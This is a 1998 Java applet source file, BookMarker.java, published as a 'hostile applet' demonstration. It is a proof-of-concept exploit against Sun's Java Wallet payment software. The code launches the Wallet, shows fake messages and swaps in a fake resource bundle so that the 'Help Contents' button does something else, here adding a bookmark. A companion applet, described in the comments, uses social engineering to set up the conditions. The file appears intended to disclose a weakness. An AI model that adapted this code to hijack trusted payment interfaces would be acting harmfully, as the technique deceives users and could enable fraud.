/* BookMarker.java by Mark D. LaDue */ /* April 30, 1998 */ /* Copyright (c) 1998 Mark D. LaDue You may study, use, modify, and distribute this example for any purpose. This example is provided WITHOUT WARRANTY either expressed or implied. */ /* This applet can alter the behavior of the Java Wallet's "Help Contents" button when run via the Java Plug-in 1.1. It works when your browser is Netscape's Communicator (4.04 or 4.05) on a UNIX platform such as Solaris. In order for the Java Wallet's "Help Contents" button to function properly on any platform, you must have jecf.browser.path set to the path of your browser in the jecf.properties file. Since this fact seems to be missing from the Java Wallet's documentation, this applet should be accompanied by a social engineering applet which reminds you to set this parameter properly. The accompanying applet, Helper.java, uses the Communicator's Java Security apparatus, along with Netscape's Certificate, in a social engineering effort to have you set jecf.browser.path. BookMarker then uses the Java Wallet to prompt you to push the "Help Contents" button. When it's successful, it will add a bookmark to the Hostile Applets Home Page. */ import java.awt.*; import java.io.*; import java.net.*; import javax.commerce.base.*; public class BookMarker extends java.applet.Applet implements Runnable, TransactionListener { Thread controller = null; String browserpath = null; String urlstr = null; String jcm = null; URL url; TextArea console = null; public void init() { // Tell what's going to happen happen console = new TextArea("BookMarker is a harmless demo applet.\n", 20, 80); console.setEditable(false); add(console); console.append("\nTo use it you must have already set up:\n"); console.append("1. Sun's Java Plug-in 1.1;\n"); console.append("2. Sun's Java Wallet PC Release 1.0 Early Access 1;\n"); console.append("3. Sun's Purchase 1.1 Java Wallet cassette.\n"); console.append("4. A Java Wallet user.\n"); console.append("\nA second applet will run and display Netscape's\n"); console.append("certificate in an effort to provide instructions\n"); console.append("and a reassuring context. The applet's goal is to\n"); console.append("alter the behavior of the Java Wallet's\n"); console.append("\"Help Contents\" button and convince you to\n"); console.append("use it. If this were a real attack, you would not\n"); console.append("be warned, and you would have to discern everything\n"); console.append("from what you see. The applet could also attempt to\n"); console.append("do more than just add a bookmark.\n"); // Download the offer which will be used to start the Java Wallet try { URL url = getCodeBase(); url = new URL(url, "offer.jcm"); BufferedInputStream bufferedinputstream = new BufferedInputStream(url.openStream()); ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream(); byte abyte0[] = new byte[4097]; int k; while((k = bufferedinputstream.read(abyte0, 0, 4096)) > 0) bytearrayoutputstream.write(abyte0, 0, k); bytearrayoutputstream.flush(); StringBuffer stringbuffer = new StringBuffer(); stringbuffer.append(new String(bytearrayoutputstream.toByteArray())); stringbuffer.append("\n"); jcm = new String(stringbuffer.toString()); bytearrayoutputstream.close(); bufferedinputstream.close(); return; } catch(Exception exception) {} } public void start() { if (controller == null) { controller = new Thread(this); controller.start(); } } public void stop() {} public void run() { // Start the Java Wallet and have it display fake messages try { Class class1 = Class.forName("javax.commerce.base.OperationThread"); OperationThread.startOperation(new JCM(jcm), this, (TransactionListener)this); } catch(Throwable throwable) {} // Alter the behavior of the "Help Contents" button JECF.globals.releaseBundle = new FakeResources(); } public void transactionPerformed(TransactionEvent transactionevent) {} }